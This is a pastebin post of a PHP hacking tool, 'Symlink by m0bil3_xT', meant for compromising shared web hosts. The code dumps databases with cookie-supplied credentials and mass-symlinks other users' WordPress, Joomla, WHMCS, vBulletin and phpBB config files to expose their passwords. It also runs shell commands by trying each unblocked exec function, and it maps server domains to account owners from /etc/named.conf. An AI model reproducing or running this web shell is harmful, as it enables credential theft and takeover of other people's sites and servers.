Symlink By Mobile_xT


SUBMITTED BY: mgalarm

DATE: Aug. 21, 2016, 3:54 p.m.

FORMAT: Text only

SIZE: 39.1 kB

HITS: 346

  1. // Symlink 1.0 by m0bil3_xT -=+Independent Hacker+=-
  2. <?php
  3. @set_magic_quotes_runtime(0);
  4. ob_start();
  5. error_reporting(0);
  6. @set_time_limit(0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. // Dump Database
  10. if($_GET["action"] == "dumpDB")
  11. {
  12. $self=$_SERVER["PHP_SELF"];
  13. if(isset($_COOKIE['dbserver']))
  14. {
  15. $date = date("Y-m-d");
  16. $dbserver = $_COOKIE["dbserver"];
  17. $dbuser = $_COOKIE["dbuser"];
  18. $dbpass = $_COOKIE["dbpass"];
  19. $dbname = $_GET['dbname'];
  20. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  21. $file = "Dump-$dbname-$date";
  22. $file="Dump-$dbname-$date.sql";
  23. $fp = fopen($file,"w");
  24. function write($data)
  25. {
  26. global $fp;
  27. fwrite($fp,$data);
  28. }
  29. mysql_connect ($dbserver, $dbuser, $dbpass);
  30. mysql_select_db($dbname);
  31. $tables = mysql_query ("SHOW TABLES");
  32. while ($i = mysql_fetch_array($tables))
  33. {
  34. $i = $i['Tables_in_'.$dbname];
  35. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  36. write($create['Create Table'].";");
  37. $sql = mysql_query ("SELECT * FROM ".$i);
  38. if (mysql_num_rows($sql)) {
  39. while ($row = mysql_fetch_row($sql)) {
  40. foreach ($row as $j => $k) {
  41. $row[$j] = "'".mysql_escape_string($k)."'";
  42. }
  43. write("INSERT INTO $i VALUES(".implode(",", $row).");");
  44. }
  45. }
  46. }
  47. fclose ($fp);
  48. header("Content-Disposition: attachment; filename=" . $file);
  49. header("Content-Type: application/download");
  50. header("Content-Length: " . filesize($file));
  51. flush();
  52. $fp = fopen($file, "r");
  53. while (!feof($fp))
  54. {
  55. echo fread($fp, 65536);
  56. flush();
  57. }
  58. fclose($fp);
  59. }
  60. }
  61. function syml($usern,$pdomain)
  62. {
  63. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  64. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  65. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  66. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  67. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  68. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  69. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  70. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  71. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  72. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  73. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  74. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  75. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  76. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  77. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  78. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  79. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  80. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  81. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  82. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  83. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  84. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  85. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  86. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  87. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  88. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  89. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  90. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  91. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  92. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  93. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  94. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  95. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  96. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  97. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  98. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  99. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  100. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  101. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  102. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  103. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  104. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  105. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  106. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  107. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  108. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  109. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  110. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  111. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  112. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  113. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  114. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  115. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  116. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  117. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  118. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  119. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  120. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  121. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  122. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  123. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  124. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  125. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  126. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  127. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  128. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  129. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  130. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  131. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  132. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  133. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  134. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  135. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  136. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  137. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  138. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  139. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  140. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  141. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  142. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  143. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  144. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  145. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  146. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  147. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  148. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  149. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  150. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  151. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  152. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  153. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  154. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  155. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  156. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  157. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  158. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  159. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  160. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  161. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  162. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  163. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  164. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  165. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  166. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  167. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  168. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  169. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  170. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  171. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  172. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  173. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  174. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  175. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  176. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  177. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  178. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  179. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  180. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  181. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  182. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  183. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  184. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  185. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  186. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  187. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  188. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  189. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  190. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  191. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  192. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  193. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  194. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  195. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  196. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  197. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  198. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  199. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  200. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  201. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  202. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  203. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  204. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  205. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  206. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  207. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  208. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  209. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  210. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  211. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  212. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  213. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  214. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  215. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  216. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  217. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  218. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  219. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  220. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  221. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  222. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  223. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  224. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  225. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  226. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  227. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  228. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  229. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  230. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  231. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  232. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  233. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  234. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  235. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  236. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  237. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  238. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  239. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  240. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  241. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  242. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  243. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  244. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  245. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  246. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  247. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  248. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  249. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  250. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  251. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  252. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  253. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  254. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  255. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  256. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  257. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  258. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  259. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  260. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  261. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  262. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  263. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  264. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  265. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  266. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  267. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  268. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  269. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  270. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  271. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  272. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  273. }
  274. ?>
  275. <head>
  276. <title>Symlink by m0bil3_xT</title>
  277. <center><img src="http://i.imgur.com/kjEJwLg.png">
  278. </head>
  279. <?php
  280. ##################################
  281. function execmd($cmd,$d_functions="None")
  282. {
  283. if($d_functions=="None")
  284. {
  285. $ret=passthru($cmd);
  286. return $ret;
  287. }
  288. $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
  289. $d_functions=str_replace(" ","",$d_functions);
  290. $dis_funcs=explode(",",$d_functions);
  291. foreach($funcs as $safe)
  292. {
  293. if(!in_array($safe,$dis_funcs))
  294. {
  295. if($safe=="exec")
  296. {
  297. $ret=@exec($cmd);
  298. $ret=join("\n",$ret);
  299. return $ret;
  300. }
  301. elseif($safe=="system")
  302. {
  303. $ret=@system($cmd);
  304. return $ret;
  305. }
  306. elseif($safe=="passthru")
  307. {
  308. $ret=@passthru($cmd);
  309. return $ret;
  310. }
  311. elseif($safe=="shell_exec")
  312. {
  313. $ret=@shell_exec($cmd);
  314. return $ret;
  315. }
  316. elseif($safe=="popen")
  317. {
  318. $cmdpipe=array(
  319. 0=>array('pipe','r'),
  320. 1=>array('pipe','w')
  321. );
  322. $resource=@proc_open($cmd,$cmdpipe,$pipes);
  323. if(@is_resource($resource))
  324. {
  325. while(@!feof($pipes[1]))
  326. $ret.=@fgets($pipes[1]);
  327. @fclose($pipes[1]);
  328. @proc_close($resource);
  329. return $ret;
  330. }
  331. return -1;
  332. }
  333. }
  334. }
  335. return -1;
  336. }
  337. function getDisabledFunctions()
  338. {
  339. if(!ini_get('disable_functions'))
  340. {
  341. return "None";
  342. }
  343. else
  344. {
  345. return @ini_get('disable_functions');
  346. }
  347. }
  348. function getFilePermissions($file)
  349. {
  350. $perms = fileperms($file);
  351. if (($perms & 0xC000) == 0xC000) {
  352. // Socket
  353. $info = 's';
  354. } elseif (($perms & 0xA000) == 0xA000) {
  355. // Symbolic Link
  356. $info = 'l';
  357. } elseif (($perms & 0x8000) == 0x8000) {
  358. // Regular
  359. $info = '-';
  360. } elseif (($perms & 0x6000) == 0x6000) {
  361. // Block special
  362. $info = 'b';
  363. } elseif (($perms & 0x4000) == 0x4000) {
  364. // Directory
  365. $info = 'd';
  366. } elseif (($perms & 0x2000) == 0x2000) {
  367. // Character special
  368. $info = 'c';
  369. } elseif (($perms & 0x1000) == 0x1000) {
  370. // FIFO pipe
  371. $info = 'p';
  372. } else {
  373. // Unknown
  374. $info = 'u';
  375. }
  376. }
  377. function odi()
  378. {
  379. $od = @ini_get("open_basedir");
  380. echo $od;
  381. }
  382. function phpver()
  383. {
  384. $pv=@phpversion();
  385. echo $pv;
  386. }
  387. function cip()
  388. {
  389. echo $_SERVER["SERVER_NAME"];
  390. }
  391. function safe()
  392. {
  393. global $sm;
  394. return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
  395. }
  396. function browse()
  397. {
  398. $brow= $_SERVER["HTTP_USER_AGENT"];
  399. print($brow);
  400. }
  401. function serveradmin()
  402. {
  403. echo $_SERVER['SERVER_ADMIN'];
  404. }
  405. function curlinfo()
  406. {
  407. echo function_exists('curl_version')?("<font color='#3366FF'>Enabled</font>"):("<font color='red'>Disabled</font>");
  408. }
  409. function postgresqlinfo()
  410. {
  411. echo function_exists('pg_connect')?("<font color='#3366FF'>Enabled</font>"):("<font color='red'>Disabled</font>");
  412. }
  413. function HumanReadableFilesize($size)
  414. {
  415. $mod = 1024;
  416. $units = explode(' ','B KB MB GB TB PB');
  417. for ($i = 0; $size > $mod; $i++)
  418. {
  419. $size /= $mod;
  420. }
  421. return round($size, 2) . ' ' . $units[$i];
  422. }
  423. ?>
  424. <?php
  425. $pinfo = "info";
  426. if(isset($_GET["com"]))
  427. {
  428. phpinfo();
  429. }
  430. else
  431. {
  432. $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font color='#3366FF'>ON</font>":"<font color='red'>OFF</font>";
  433. $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
  434. ?>
  435. <?php
  436. $d = str_replace("\\",$directorysperator,$dir);
  437. if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
  438. $d = str_replace("\\\\","\\",$d);
  439. $dispd = htmlspecialchars($d);
  440. $pd = $e = explode($directorysperator,substr($d,0,-1));
  441. $i = 0;
  442. foreach($pd as $b)
  443. {
  444. $t = '';
  445. $j = 0;
  446. foreach ($e as $r)
  447. {
  448. $t.= $r.$directorysperator;
  449. if ($j == $i) {break;}
  450. $j++;
  451. }
  452. $href='dir='.$t;
  453. echo '<a href="'.$self."?$href\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
  454. $i++;
  455. }
  456. ?>
  457. <?php
  458. if(isset($_GET['to']) && isset($_GET['file']))
  459. {
  460. if(!rename($_GET['file'], $_GET['to']))
  461. {
  462. $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
  463. header("Location:$loc");
  464. ob_end_flush();
  465. }
  466. else
  467. {
  468. $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
  469. header("Location:$loc");
  470. ob_end_flush();
  471. }
  472. }
  473. $setuploadvalue = 0;
  474. ?>
  475. <body bgcolor="#000000">
  476. <?php
  477. {
  478. ?>
  479. <center><table><tr><td><a href="<?php echo $self; ?>?domains&symlinkserver"><font color="#3366FF" size="4">| Get Domains |</font></a></td>
  480. <td><a href="<?php echo $self; ?>?users&symlinkserver"><font color="#3366FF" size="4">| Users & Domains |</font></a></td>
  481. <td><a href="<?php echo $self; ?>?symlink&symlinkserver"><font color="#3366FF" size="4">| Symlink Server |</font></a></td>
  482. <td><a href="<?php echo $self; ?>?symlinkfile&symlinkserver"><font color="#3366FF" size="4">| Symlink File |</font></a></td>
  483. <td><a href="<?php echo $self; ?>?script&symlinkserver"><font color="#3366FF" size="4">| Config Locator |</font></a></td>
  484. </tr></table></center><br>
  485. <?php
  486. if(isset($_GET["domains"]))
  487. {
  488. ?> <center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center>
  489. <?php }
  490. else if(isset($_GET["users"]))
  491. {
  492. $d0mains = @file("/etc/named.conf");
  493. if(!$d0mains)
  494. {
  495. die("<center><font size=4 color=red>cannot ReaD -> [ /etc/named.conf ]</font><center>");
  496. }
  497. $url = 'http://'.$_SERVER['SERVER_NAME'];
  498. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Get Domains</font></td><td align=center><font size=4 color=red>Users</font></td></tr>";
  499. foreach($d0mains as $d0main)
  500. {
  501. if(eregi("zone",$d0main))
  502. {
  503. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  504. flush();
  505. if(strlen(trim($domains[1][0])) > 2)
  506. {
  507. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  508. echo "<tr><td><a href=http://www.".$domains[1][0]."/><font size=3 color=#0066FF>".$domains[1][0]."</font></a></td><td><font size=3 color=#0066FF>" . $user['name']. "</font></td></tr>";
  509. flush();
  510. }
  511. }
  512. }
  513. echo "</table>";
  514. }
